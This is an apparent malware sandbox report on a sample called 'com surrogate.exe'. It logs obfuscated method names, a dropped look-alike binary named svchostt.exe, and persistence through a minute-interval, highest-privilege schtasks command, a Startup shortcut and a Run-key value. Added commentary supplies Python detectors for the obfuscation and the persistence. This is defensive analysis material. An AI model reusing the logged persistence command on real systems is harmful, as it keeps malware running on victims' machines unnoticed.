                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_00007FFD9B8B2316 push 8B485F93h; iretd 5_2_00007FFD9B8B231B
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 9_2_00007FFD9B6ED2A5 pushad ; iretd 9_2_00007FFD9B6ED2A6
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 9_2_00007FFD9B8000AD pushad ; iretd 9_2_00007FFD9B8000C1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 9_2_00007FFD9B8D2316 push 8B485F91h; iretd 9_2_00007FFD9B8D231B
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_00007FFD9B6CD2A5 pushad ; iretd 11_2_00007FFD9B6CD2A6
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_00007FFD9B7E00AD pushad ; iretd 11_2_00007FFD9B7E00C1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_00007FFD9B8B2316 push 8B485F93h; iretd 11_2_00007FFD9B8B231B
                      Source: C:\Users\user\svchostt.exe Code function: 15_2_00007FFD9B7F000C push edi; retf 0000h 15_2_00007FFD9B7F002A
                      Source: C:\Users\user\svchostt.exe Code function: 15_2_00007FFD9B7F00AD pushad ; iretd 15_2_00007FFD9B7F00C1
                      Source: C:\Users\user\svchostt.exe Code function: 17_2_00007FFD9B7D00AD pushad ; iretd 17_2_00007FFD9B7D00C1
                      Source: C:\Users\user\svchostt.exe Code function: 18_2_00007FFD9B7D00AD pushad ; iretd 18_2_00007FFD9B7D00C1
                      Source: C:\Users\user\svchostt.exe Code function: 19_2_00007FFD9B7D00AD pushad ; iretd 19_2_00007FFD9B7D00C1
                      Source: com surrogate.exe, VSz7jnTmNY.cs High entropy of concatenated method names: 'ajb9vjlo4Q', 'E33G6jmXl7', 'JOHc4j6jdh', 'ye6qOi0aVw00hEtMdNIZQsc4ALu4y5UwoooOW8fcEx', 'RxyN3Hddmf9R2rcoTcq7ayRXx9AiXK9VVBv4oq98yh', 'ymaiGQZqh8zdPxDqYXbTohRnaHiEne7UvUDvrLCHqJ', 'H2NUd91uckTaSArPYVctGnguQLmCvuJQem10d7VrIF', '_5gSv4yOg8QWw9n7pefpVLqIt6LpyChA5hxtuukzLsd', 'tCacjJBwcBXDiO0sZiwIwL4WqGKrbhqTaPqjyWI9Pp', 'itHsLzyJPPooimhNoFP6kHqeEewGuQc3fCJvyHQ0Tq'
                      Source: com surrogate.exe, SSDW2h8Bu2.cs High entropy of concatenated method names: 'x6vc3FsdNT', 'K844Sa3pgA', 'C4B1OSffgm', 'RtzMzFD2Y0', 'UqKfA1pMWi', 'wdJUezNc1a', 'smhnlO4J44', '_39Bf3cn9oD', 'jbXQPYJQHC', 'mKtP0nJhH7'
                      Source: com surrogate.exe, TmY9KD9bMG.cs High entropy of concatenated method names: 'W0fEdETOXV', 'uZfigOI1sw', 'smEqsHgW3z', 'wkhNUfGdpt', 'HH5zQxMR9g', 'Y0wWV39GV8', 'hNx61QRxdE', 'AHUbz88CWL', 'AiWPx31sl4', 'PQe3QHXKnP'
                      Source: com surrogate.exe, HmgYWU24nC.cs High entropy of concatenated method names: '_5ar0Fpeld0', '_7BsNBZ4IQi', 'w5YHfU19q9', 'RSitqILqgT', 'RgJXYks985', 'XEo8BHyoYN', '_9y6dq12wra', 'l24vVhqYm6', 'pZ9Mn9VyEU', 'pIST06FXZx'
                      Source: com surrogate.exe, VffR91FvSC.cs High entropy of concatenated method names: '_7xxuC5bIb7', 'ucZzEMCPxkvKcgv7WQWLgzIQoFCQ78uu4lsEHLwF4G', 'uY47gVZ1GXeKryhSGrhgj6wA8dciM4jrRythYuigEN', 'vp5IkScOkgA2G1aJOi49wfhK8foiw8V1aa14pM3xCs', 'G9Pone1lU4rIwts7geH20rGXgs4KFdHwPSuOTbrGaS'
                      Source: com surrogate.exe, ejashRItfb.cs High entropy of concatenated method names: '_0lWmHzKxwA', 'Ip5GvT6uuz', 'IAhLWraESL', '_448ALCfdN3', 'aO8dVIS5qB', 'jz7vp4qAhy', 'aDpnmPoDCP', '_5Oh0qKyPnl', '_86zri9qwpH', 'V7qR7N1V66'
                      Source: com surrogate.exe, aMYd9j6M7p.cs High entropy of concatenated method names: '_7gRd66NihM', 'SaU7m5hGOh', 'JsjdEbCUmL', 'TVcDWi34C5', 'QLbXfCkXYU', 'wkMU3zD5Mn', 'OQj7Gew95i', 'nUpROWLoUA', 'U94vHxsyNp', 'Zv7BfsuFCR'
                      Source: com surrogate.exe, ud8qZJW4yM.cs High entropy of concatenated method names: 'r4FtEHEMcV', 'l43kpGgr2H', 'gNUKGfsQBA', 'bjUAKiZth4', 'nEHE0R0uEK', '_9RMCpklbs4', '_8hl9WUTHKe', 'mF5l8D5HeJ', 'gd7dd6pzAb', 'PqGTSWbGD5'
                      Source: svchostt.exe.0.dr, VSz7jnTmNY.cs High entropy of concatenated method names: 'ajb9vjlo4Q', 'E33G6jmXl7', 'JOHc4j6jdh', 'ye6qOi0aVw00hEtMdNIZQsc4ALu4y5UwoooOW8fcEx', 'RxyN3Hddmf9R2rcoTcq7ayRXx9AiXK9VVBv4oq98yh', 'ymaiGQZqh8zdPxDqYXbTohRnaHiEne7UvUDvrLCHqJ', 'H2NUd91uckTaSArPYVctGnguQLmCvuJQem10d7VrIF', '_5gSv4yOg8QWw9n7pefpVLqIt6LpyChA5hxtuukzLsd', 'tCacjJBwcBXDiO0sZiwIwL4WqGKrbhqTaPqjyWI9Pp', 'itHsLzyJPPooimhNoFP6kHqeEewGuQc3fCJvyHQ0Tq'
                      Source: svchostt.exe.0.dr, SSDW2h8Bu2.cs High entropy of concatenated method names: 'x6vc3FsdNT', 'K844Sa3pgA', 'C4B1OSffgm', 'RtzMzFD2Y0', 'UqKfA1pMWi', 'wdJUezNc1a', 'smhnlO4J44', '_39Bf3cn9oD', 'jbXQPYJQHC', 'mKtP0nJhH7'
                      Source: svchostt.exe.0.dr, TmY9KD9bMG.cs High entropy of concatenated method names: 'W0fEdETOXV', 'uZfigOI1sw', 'smEqsHgW3z', 'wkhNUfGdpt', 'HH5zQxMR9g', 'Y0wWV39GV8', 'hNx61QRxdE', 'AHUbz88CWL', 'AiWPx31sl4', 'PQe3QHXKnP'
                      Source: svchostt.exe.0.dr, HmgYWU24nC.cs High entropy of concatenated method names: '_5ar0Fpeld0', '_7BsNBZ4IQi', 'w5YHfU19q9', 'RSitqILqgT', 'RgJXYks985', 'XEo8BHyoYN', '_9y6dq12wra', 'l24vVhqYm6', 'pZ9Mn9VyEU', 'pIST06FXZx'
                      Source: svchostt.exe.0.dr, VffR91FvSC.cs High entropy of concatenated method names: '_7xxuC5bIb7', 'ucZzEMCPxkvKcgv7WQWLgzIQoFCQ78uu4lsEHLwF4G', 'uY47gVZ1GXeKryhSGrhgj6wA8dciM4jrRythYuigEN', 'vp5IkScOkgA2G1aJOi49wfhK8foiw8V1aa14pM3xCs', 'G9Pone1lU4rIwts7geH20rGXgs4KFdHwPSuOTbrGaS'
                      Source: svchostt.exe.0.dr, ejashRItfb.cs High entropy of concatenated method names: '_0lWmHzKxwA', 'Ip5GvT6uuz', 'IAhLWraESL', '_448ALCfdN3', 'aO8dVIS5qB', 'jz7vp4qAhy', 'aDpnmPoDCP', '_5Oh0qKyPnl', '_86zri9qwpH', 'V7qR7N1V66'
                      Source: svchostt.exe.0.dr, aMYd9j6M7p.cs High entropy of concatenated method names: '_7gRd66NihM', 'SaU7m5hGOh', 'JsjdEbCUmL', 'TVcDWi34C5', 'QLbXfCkXYU', 'wkMU3zD5Mn', 'OQj7Gew95i', 'nUpROWLoUA', 'U94vHxsyNp', 'Zv7BfsuFCR'
                      Source: svchostt.exe.0.dr, ud8qZJW4yM.cs High entropy of concatenated method names: 'r4FtEHEMcV', 'l43kpGgr2H', 'gNUKGfsQBA', 'bjUAKiZth4', 'nEHE0R0uEK', '_9RMCpklbs4', '_8hl9WUTHKe', 'mF5l8D5HeJ', 'gd7dd6pzAb', 'PqGTSWbGD5'
                      Source: 0.2.com surrogate.exe.2d2f730.0.raw.unpack, VSz7jnTmNY.cs High entropy of concatenated method names: 'ajb9vjlo4Q', 'E33G6jmXl7', 'JOHc4j6jdh', 'ye6qOi0aVw00hEtMdNIZQsc4ALu4y5UwoooOW8fcEx', 'RxyN3Hddmf9R2rcoTcq7ayRXx9AiXK9VVBv4oq98yh', 'ymaiGQZqh8zdPxDqYXbTohRnaHiEne7UvUDvrLCHqJ', 'H2NUd91uckTaSArPYVctGnguQLmCvuJQem10d7VrIF', '_5gSv4yOg8QWw9n7pefpVLqIt6LpyChA5hxtuukzLsd', 'tCacjJBwcBXDiO0sZiwIwL4WqGKrbhqTaPqjyWI9Pp', 'itHsLzyJPPooimhNoFP6kHqeEewGuQc3fCJvyHQ0Tq'
                      Source: 0.2.com surrogate.exe.2d2f730.0.raw.unpack, SSDW2h8Bu2.cs High entropy of concatenated method names: 'x6vc3FsdNT', 'K844Sa3pgA', 'C4B1OSffgm', 'RtzMzFD2Y0', 'UqKfA1pMWi', 'wdJUezNc1a', 'smhnlO4J44', '_39Bf3cn9oD', 'jbXQPYJQHC', 'mKtP0nJhH7'
                      Source: 0.2.com surrogate.exe.2d2f730.0.raw.unpack, TmY9KD9bMG.cs High entropy of concatenated method names: 'W0fEdETOXV', 'uZfigOI1sw', 'smEqsHgW3z', 'wkhNUfGdpt', 'HH5zQxMR9g', 'Y0wWV39GV8', 'hNx61QRxdE', 'AHUbz88CWL', 'AiWPx31sl4', 'PQe3QHXKnP'
                      Source: 0.2.com surrogate.exe.2d2f730.0.raw.unpack, HmgYWU24nC.cs High entropy of concatenated method names: '_5ar0Fpeld0', '_7BsNBZ4IQi', 'w5YHfU19q9', 'RSitqILqgT', 'RgJXYks985', 'XEo8BHyoYN', '_9y6dq12wra', 'l24vVhqYm6', 'pZ9Mn9VyEU', 'pIST06FXZx'
                      Source: 0.2.com surrogate.exe.2d2f730.0.raw.unpack, VffR91FvSC.cs High entropy of concatenated method names: '_7xxuC5bIb7', 'ucZzEMCPxkvKcgv7WQWLgzIQoFCQ78uu4lsEHLwF4G', 'uY47gVZ1GXeKryhSGrhgj6wA8dciM4jrRythYuigEN', 'vp5IkScOkgA2G1aJOi49wfhK8foiw8V1aa14pM3xCs', 'G9Pone1lU4rIwts7geH20rGXgs4KFdHwPSuOTbrGaS'
                      Source: 0.2.com surrogate.exe.2d2f730.0.raw.unpack, ejashRItfb.cs High entropy of concatenated method names: '_0lWmHzKxwA', 'Ip5GvT6uuz', 'IAhLWraESL', '_448ALCfdN3', 'aO8dVIS5qB', 'jz7vp4qAhy', 'aDpnmPoDCP', '_5Oh0qKyPnl', '_86zri9qwpH', 'V7qR7N1V66'
                      Source: 0.2.com surrogate.exe.2d2f730.0.raw.unpack, aMYd9j6M7p.cs High entropy of concatenated method names: '_7gRd66NihM', 'SaU7m5hGOh', 'JsjdEbCUmL', 'TVcDWi34C5', 'QLbXfCkXYU', 'wkMU3zD5Mn', 'OQj7Gew95i', 'nUpROWLoUA', 'U94vHxsyNp', 'Zv7BfsuFCR'
                      Source: 0.2.com surrogate.exe.2d2f730.0.raw.unpack, ud8qZJW4yM.cs High entropy of concatenated method names: 'r4FtEHEMcV', 'l43kpGgr2H', 'gNUKGfsQBA', 'bjUAKiZth4', 'nEHE0R0uEK', '_9RMCpklbs4', '_8hl9WUTHKe', 'mF5l8D5HeJ', 'gd7dd6pzAb', 'PqGTSWbGD5'
                      Source: C:\Users\user\Desktop\com surrogate.exe File created: C:\Users\user\svchostt.exe
                      Source: C:\Users\user\Desktop\com surrogate.exe File created: C:\Users\user\svchostt.exe
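The "High entropy of concatenated method names" findings above are a heuristic for renaming obfuscation: a real class has names like GetValue or Dispose, an obfuscated one has names that look like random alphanumerics, and the Shannon entropy of all names joined together separates the two. The block below is an added example of that heuristic, written for this page and not Joe Sandbox's own implementation. The method names of two classes (VSz7jnTmNY.cs and HmgYWU24nC.cs) are taken verbatim from the report; the benign control class and the 4.5 bits-per-character cutoff are assumptions, since the report does not state the threshold it uses.

```python
import math
from collections import Counter

# Method names exactly as listed in the report for two of the sample's decompiled classes.
OBFUSCATED_NAMES = {
    "VSz7jnTmNY.cs": [
        "ajb9vjlo4Q", "E33G6jmXl7", "JOHc4j6jdh",
        "ye6qOi0aVw00hEtMdNIZQsc4ALu4y5UwoooOW8fcEx",
        "RxyN3Hddmf9R2rcoTcq7ayRXx9AiXK9VVBv4oq98yh",
        "ymaiGQZqh8zdPxDqYXbTohRnaHiEne7UvUDvrLCHqJ",
        "H2NUd91uckTaSArPYVctGnguQLmCvuJQem10d7VrIF",
        "_5gSv4yOg8QWw9n7pefpVLqIt6LpyChA5hxtuukzLsd",
        "tCacjJBwcBXDiO0sZiwIwL4WqGKrbhqTaPqjyWI9Pp",
        "itHsLzyJPPooimhNoFP6kHqeEewGuQc3fCJvyHQ0Tq",
    ],
    "HmgYWU24nC.cs": [
        "_5ar0Fpeld0", "_7BsNBZ4IQi", "w5YHfU19q9", "RSitqILqgT", "RgJXYks985",
        "XEo8BHyoYN", "_9y6dq12wra", "l24vVhqYm6", "pZ9Mn9VyEU", "pIST06FXZx",
    ],
}

# Constructed control set (not from the report): what ordinary method names look like.
BENIGN_NAMES = {
    "Settings.cs": ["GetName", "SetName", "GetValue", "SetValue", "GetData",
                    "SetData", "Load", "Save", "Open", "Close"],
}

# Assumed cutoff in bits per character; the report does not publish the one it uses.
ENTROPY_THRESHOLD = 4.5


def shannon_entropy(text: str) -> float:
    """Bits per character of the empirical symbol distribution of `text`."""
    if not text:
        return 0.0
    counts = Counter(text)
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def normalise(name: str) -> str:
    """Drop the '_' a decompiler prepends to IL names that start with a digit.

    C# identifiers cannot begin with a digit, so '_5ar0Fpeld0' is the decompiler's
    rendering of '5ar0Fpeld0'; the underscore is an artefact, not part of the name.
    """
    if name.startswith("_") and len(name) > 1 and name[1].isdigit():
        return name[1:]
    return name


def concatenated_name_entropy(names: list) -> float:
    """Entropy of all method names of one class joined into a single string."""
    return shannon_entropy("".join(normalise(n) for n in names))


def flag_high_entropy(classes: dict, threshold: float = ENTROPY_THRESHOLD) -> dict:
    """Return {class_file: entropy} for every class above the threshold."""
    flagged = {}
    for cls, names in classes.items():
        e = concatenated_name_entropy(names)
        if e > threshold:
            flagged[cls] = round(e, 2)
    return flagged


if __name__ == "__main__":
    for label, classes in (("sample", OBFUSCATED_NAMES), ("control", BENIGN_NAMES)):
        for cls, names in classes.items():
            print(f"{label:8} {cls:16} {concatenated_name_entropy(names):.2f} bits/char")
    print("flagged:", flag_high_entropy(OBFUSCATED_NAMES))
```

The heuristic works on a whole class rather than individual names because a single short identifier has too few symbols for a stable estimate; joining ten of them gives a sample large enough that random renaming lands well above ordinary English-derived names.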

                      Boot Survival

                      Source: C:\Users\user\Desktop\com surrogate.exe File created: C:\Users\user\svchostt.exe
                      Source: C:\Users\user\Desktop\com surrogate.exe Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchostt" /tr "C:\Users\user\svchostt.exe"
                      Source: C:\Users\user\Desktop\com surrogate.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchostt.lnk
                      Source: C:\Users\user\Desktop\com surrogate.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchostt.lnk
                      Source: C:\Users\user\Desktop\com surrogate.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run svchostt
                      Source: C:\Users\user\Desktop\com surrogate.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run svchostt
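The three persistence mechanisms above (a scheduled task that re-runs the dropped binary every minute with the highest run level, a Startup-folder .lnk, and an HKCU Run value) all point at the same file, C:\Users\user\svchostt.exe, whose name is one letter away from svchost.exe. The block below is an added example, written for this page rather than taken from the report or from any detection product, of how a process-creation or autorun event can be scored against exactly those traits. The schtasks command line is the one recorded in the report; the benign contrast task, the list of imitated system binaries and the "five minutes or less" cutoff are assumptions made for the example.

```python
import re
from os.path import basename, splitext
from typing import Dict, List, Optional, Union

# Command line as recorded in the report (process 0 -> schtasks.exe).
OBSERVED_SCHTASKS = (r'"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute '
                     r'/mo 1 /tn "svchostt" /tr "C:\Users\user\svchostt.exe"')
# Constructed contrast event: a nightly task whose action lives under Program Files.
BENIGN_SCHTASKS = (r'schtasks.exe /create /tn "NightlyBackup" /sc daily /st 02:00 '
                   r'/tr "C:\Program Files\Backup\backup.exe"')
# Target of the HKCU\...\CurrentVersion\Run\svchostt value and of the Startup .lnk (from the report).
OBSERVED_RUN_VALUE = r"C:\Users\user\svchostt.exe"

# Assumed list of names malware likes to imitate; extend it from your own baseline.
SYSTEM_BINARIES = ["svchost", "csrss", "lsass", "winlogon", "explorer", "dllhost", "conhost", "rundll32"]
MAX_MINUTES = 5  # assumed cutoff: a task firing this often is a watchdog, not a job

TOKEN_RE = re.compile(r'"([^"]*)"|(\S+)')
USER_ROOT_RE = re.compile(r"^[a-z]:\\users\\[^\\]+\\[^\\]+\.exe$", re.I)


def tokenize(cmdline: str) -> List[str]:
    """Split a Windows command line on whitespace while honouring double quotes."""
    return [quoted or bare for quoted, bare in TOKEN_RE.findall(cmdline)]


def parse_schtasks(cmdline: str) -> Dict[str, Union[str, bool]]:
    """Map each /switch to its value; switches that take no value (e.g. /f) map to True."""
    toks = tokenize(cmdline)
    args: Dict[str, Union[str, bool]] = {}
    i = 1  # toks[0] is the executable
    while i < len(toks):
        if toks[i].startswith("/"):
            key = toks[i][1:].lower()
            if i + 1 < len(toks) and not toks[i + 1].startswith("/"):
                args[key] = toks[i + 1]
                i += 2
                continue
            args[key] = True
        i += 1
    return args


def levenshtein(a: str, b: str) -> int:
    """Edit distance, used to catch one-character look-alikes such as svchostt."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def lookalike_system_binary(path: str) -> Optional[str]:
    """Name of the system binary a file imitates: one edit away, or the exact name outside C:\\Windows."""
    stem = splitext(basename(path.replace("\\", "/")))[0].lower()
    in_windows = path.lower().startswith("c:\\windows\\")
    for name in SYSTEM_BINARIES:
        d = levenshtein(stem, name)
        if d == 1 or (d == 0 and not in_windows):
            return name
    return None


def assess_autorun_target(path: str) -> List[str]:
    """Reasons a Run-key value, Startup .lnk target or task action is suspicious."""
    reasons = []
    if USER_ROOT_RE.match(path):
        reasons.append("executable dropped directly in the user profile root")
    if "\\appdata\\" in path.lower() or "\\temp\\" in path.lower():
        reasons.append("executable under AppData or Temp")
    name = lookalike_system_binary(path)
    if name:
        reasons.append(f"file name imitates {name}.exe")
    return reasons


def assess_schtasks(cmdline: str) -> List[str]:
    """Score a schtasks command line; an empty list means nothing stood out."""
    args = parse_schtasks(cmdline)
    if "create" not in args:
        return []
    reasons = []
    modifier = str(args.get("mo", "1"))  # schtasks defaults /mo to 1 for /sc minute
    if str(args.get("sc", "")).lower() == "minute" and modifier.isdigit() and int(modifier) <= MAX_MINUTES:
        reasons.append(f"re-launched every {modifier} minute(s): watchdog-style persistence")
    if str(args.get("rl", "")).upper() == "HIGHEST":
        reasons.append("runs with the highest available privileges (/RL HIGHEST)")
    if args.get("f") is True:
        reasons.append("/f silently overwrites any existing task of the same name")
    reasons += assess_autorun_target(str(args.get("tr", "")))
    return reasons


if __name__ == "__main__":
    for line in (OBSERVED_SCHTASKS, BENIGN_SCHTASKS):
        print(line, "->", assess_schtasks(line) or "clean")
    print(OBSERVED_RUN_VALUE, "->", assess_autorun_target(OBSERVED_RUN_VALUE))
```

Scoring the task action path with the same function used for the Run value and the .lnk target is deliberate: all three autorun channels in this report converge on one file, so a single path-based rule covers them, while the schtasks-specific traits (/sc minute /mo 1, /RL HIGHEST, /f) add the evidence that distinguishes a watchdog task from a legitimate job.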

                      Hooking and other Techniques for Hiding and Protection

                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Users\user\Desktop\com surrogate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
